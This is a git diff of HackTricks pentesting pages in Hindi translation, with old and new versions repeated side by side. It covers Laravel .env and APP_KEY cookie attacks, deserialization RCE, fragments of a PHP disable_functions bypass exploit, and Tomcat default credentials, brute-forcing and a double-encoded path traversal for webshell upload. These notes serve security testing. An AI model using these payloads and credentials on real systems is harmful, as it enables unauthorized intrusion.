<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
## Laravel ट्रिक्स ## Laravel Tricks
### डीबगिंग मोड ### Debugging mode
यदि Laravel **डीबगिंग मोड** में है, तो आपको **कोड** और **संवेदनशील डेटा** तक पहुंच मिलेगी।\ यदि Laravel **डीबगिंग मोड** में है तो आप **कोड** और **संवेदनशील डेटा** तक पहुंच सकेंगे।\
उदाहरण के लिए `http://127.0.0.1:8000/profiles`: उदाहरण के लिए `http://127.0.0.1:8000/profiles`:
![](<../../.gitbook/assets/image (610).png>) ![](<../../.gitbook/assets/image (610).png>)
इसे आमतौर पर अन्य Laravel RCE CVEs को शोषण करने के लिए आवश्यक होता है। यह आम तौर पर अन्य Laravel RCE CVEs का शोध करने के लिए आवश्यक होता है।
### .env ### .env
Laravel `.env` नामक एक फ़ाइल में उन APP को सहेजता है जिन्हें यह कुकीज़ और अन्य प्रमाणीकरण को एन्क्रिप्ट करने के लिए उपयोग करता है, जिसे कुछ पथ ट्रावर्सल का उपयोग करके पहुंचा जा सकता है: `/../.env` Laravel एक फ़ाइल में सहेजता है जिसे `.env` कहा जाता है और जिसका उपयोग कुकी और अन्य क्रेडेंशियल को एन्क्रिप्ट करने के लिए करता है, जिसका पथ ट्रावर्सल का उपयोग करके पहुंचा जा सकता है: `/../.env`
Laravel इस जानकारी को डीबग पेज में भी दिखाएगा (जब Laravel कोई त्रुटि ढूंढ़ता है और यह सक्रिय होता है)। Laravel इस जानकारी को डिबग पेज में भी दिखाएगा (जो लारावेल एक त्रुटि पाता है और यह सक्रिय होता है).
Laravel के गुप्त APP\_KEY का उपयोग करके आप कुकीज़ को डिक्रिप्ट और पुनः एन्क्रिप्ट कर सकते हैं: लारावेल की गुप्त APP\_KEY का उपयोग करके आप कुकी को डिक्रिप्ट और पुनः एन्क्रिप्ट कर सकते हैं:
### कुकी डिक्रिप्ट करें ### Decrypt Cookie
```python ```python
import os import os
import json import json
@ -92,12 +92,12 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
``` ```
### Laravel डिसीरियलाइज़ेशन RCE ### Laravel डिसीरियलाइज़ेशन RCE
िकल्पशील संस्करण: 5.5.40 और 5.6.x से 5.6.29 तक ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/)) ंलरेबल संस्करण: 5.5.40 और 5.6.x से 5.6.29 तक ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
यहां आप डिसीरियलाइज़ेशन संकट के बारे में जानकारी पा सकते हैं: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) यहाँ आप डिसीरियलाइज़ेशन वंलरेबिलिटी के बारे में जानकारी पा सकते हैं: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
आप इसे टेस्ट और शोषण कर सकते हैं उपयोग करके [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ आप इसे टेस्ट और एक्सप्लॉइट कर सकते हैं [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
या आप इसे मेटास्प्लोइट के साथ भी शोषण कर सकते हैं: `use unix/http/laravel_token_unserialize_exec` या आप इसे metasploit के साथ भी एक्सप्लॉइट कर सकते हैं: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129 ### CVE-2021-3129
@ -105,16 +105,16 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
### Laravel SQLInjection ### Laravel SQLInjection
इसके बारे में जानकारी यहा पढ़ें: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) इसके बारे में जानकारी यहा पढ़ें: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * पाएं [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**. * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -1,20 +1,20 @@
# disable\_functions बाईपास - PHP 7.0-7.4 (\*निक्स केवल) # डिसेबल\_फंक्शन्स बायपास - PHP 7.0-7.4 (\*निक्स केवल)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
## PHP 7.0-7.4 (\*निक्स केवल) ## PHP 7.0-7.4 (\*निक्स केवल)
[https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php) से। From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)
```php ```php
<?php <?php
@ -229,8 +229,7 @@ write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
# pwn # pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x38, 1, 4); # internal func type
```php write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
write($abc, 0xd0 + 0x68, $zif_system); # आंतरिक फंक्शन हैंडलर
($helper->b)($cmd); ($helper->b)($cmd);
exit(); exit();
@ -240,10 +239,10 @@ exit();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषताएं खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों को खोजता है। [**इसे नि: शुल्क परीक्षण के लिए आज़माएं**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। े सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,8 +22,8 @@
## खोज ## खोज
* यह आमतौर पर **पोर्ट 8080** पर चलता है * यह आम तौर पर **पोर्ट 8080** पर चलता है
* **सामान्य टॉमकैट त्रुटि:** * **सामान्य टॉमकैट त्रुटि:**
<figure><img src="../../.gitbook/assets/image (1) (6).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1) (6).png" alt=""><figcaption></figcaption></figure>
@ -35,32 +35,32 @@ curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author" <html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
``` ```
### प्रबंधक फ़ाइलों का पता लगाएं ### व्यवस्थापक फ़ाइलों का पता लगाएं
यह दिलचस्प होता है कि **`/manager`** और **`/host-manager`** पृष्ठ कहा हैं क्योंकि उनका नाम अलग हो सकता है। आप ब्रूट-फ़ोर्स के साथ उन्हें खोज सकते हैं। यह दिलचस्प है कि **`/manager`** और **`/host-manager`** पृष्ठ कहा हैं क्योंकि उनका नाम अलग हो सकता है। आप इसे ब्रूट-फ़ोर्स के साथ खोज सकते हैं।
### उपयोगकर्ता नाम सूचीकरण ### उपयोगकर्ता नाम सूचीकरण
Tomcat6 से पहले कुछ संस्करणों में आप उपयोगकर्ताओं की सूचीकरण कर सकते थे: कुछ Tomcat6 से पहले के संस्करणों में आप उपयोगकर्ताओं की सूची बना सकते थे:
```bash ```bash
msf> use auxiliary/scanner/http/tomcat_enum msf> use auxiliary/scanner/http/tomcat_enum
``` ```
### डिफ़ॉल्ट क्रेडेंशियल्स ### डिफ़ॉल्ट क्रेडेंशियल्स
Tomcat का सबसे रोचक पथ _**/manager/html**_ है, इस पथ में **आप वार फ़ाइल अपलोड और डिप्लॉय कर सकते हैं** (कोड चला सकते हैं)। लेकिन यह पथ बेसिक HTTP ऑथ से सुरक्षित है, सबसे सामान्य क्रेडेंशियल्स हैं: Tomcat का सबसे दिलचस्प मार्ग _**/manager/html**_ है, इस मार्ग के अंदर **आप war फ़ाइलें अपलोड और डिप्लॉय कर सकते हैं** (कोड को निष्पादित करें)। लेकिन यह मार्ग बेसिक HTTP ऑथ से सुरक्षित है, सबसे सामान्य क्रेडेंशियल्स हैं:
* admin:admin * admin:admin
* tomcat:tomcat * tomcat:tomcat
* admin:\<कुछ नहीं> * admin:\<NOTHING>
* admin:s3cr3t * admin:s3cr3t
* tomcat:s3cr3t * tomcat:s3cr3t
* admin:tomcat * admin:tomcat
आप इनमें से और भी टेस्ट कर सकते हैं: आप इनमें से एक या अधिक को टेस्ट कर सकते हैं:
```bash ```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login msf> use auxiliary/scanner/http/tomcat_mgr_login
``` ```
एक और **रोचक Tomcat** पथ है _**/manager/status**_, जहां आप ओएस और Tomcat के संस्करण को देख सकते हैं। यह उपयोगी होता है जब आप _**/manager/html**_ तक पहुंच नहीं पा रहे हों और Tomcat के संस्करण को प्रभावित करने वाली vulns को खोजने में सहायता मिलती है। एक और **रोचक Tomcat** पथ है _**/manager/status**_, जहाँ आप ऑपरेटिंग सिस्टम और Tomcat का संस्करण देख सकते हैं। यह उपयोगी है जब आप _**/manager/html**_ तक पहुंच नहीं सकते हैं और Tomcat के संस्करण को प्रभावित करने वाली दोषों को खोजने में मदद मिलती है।
### ब्रूटफोर्स ### ब्रूटफोर्स
```bash ```bash
@ -71,63 +71,63 @@ msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP> msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>
``` ```
## खोज ## दुरुपयोग
### पासवर्ड बैकट्रेस खुलासा ### पासवर्ड बैकट्रेस डिस्क्लोज़र
`/auth.jsp` तक पहुंचने का प्रयास करें और यदि आप बहुत भाग्यशाली हैं तो यह **बैकट्रेस में पासवर्ड खुलासा कर सकता है**। `/auth.jsp` तक पहुंचने का प्रयास करें और यदि आप बहुत भाग्यशाली हैं तो यह **बैकट्रेस में पासवर्ड डिस्क्लोज़ कर सकता है**।
### डबल URL कोड ### डबल URL एन्कोड
एक अच्छी तरह से जानी जाने वाली कमजोरी _को_ पहुंचने के लिए एप्लिकेशन प्रबंधक \_\_ में mod\_jk है CVE-2007-1860, जो **डबल URL कोड पथ ट्रावर्सल** की अनुमति देता है। एक प्रसिद्ध कमजोरी _एक्सेस_ एप्लिकेशन प्रबंधक \_\_ में है mod\_jk CVE-2007-1860 में, जो **डबल URL एन्कोड पथ ट्रावर्सल** की अनुमति देता है।
Tomcat के प्रबंधन वेब तक पहुंचने के लिए जाएँ: _pathTomcat/%252E%252E/manager/html_ Tomcat के प्रबंधन वेब तक पहुंचने के लिए: _pathTomcat/%252E%252E/manager/html_
ध्यान दें कि वेबशेल अपलोड करने के लिए आपको डबल URL कोड ट्रिक का उपयोग करने की आवश्यकता हो सकती है और साथ ही कुकी और/या एक SSRF टोकन भी भेजने की आवश्यकता हो सकती है।\ ध्यान दें कि वेबशेल अपलोड करने के लिए आपको डबल यूआरएल एन्कोड ट्रिक का उपयोग करना पड़ सकता है और साथ ही एक कुकी और/या एक एसएसआरएफ टोकन भेजना भी।\
बैकडोर तक पहुंचने के लिए आपको डबल URL कोड ट्रिक का उपयोग करने की आवश्यकता भी हो सकती है। बैकडोर तक पहुंचने के लिए आपको डबल यूआरएल एन्कोड ट्रिक का उपयोग करने की भी आवश्यकता हो सकती है।
### /उदाहरण ### /उदाहरण
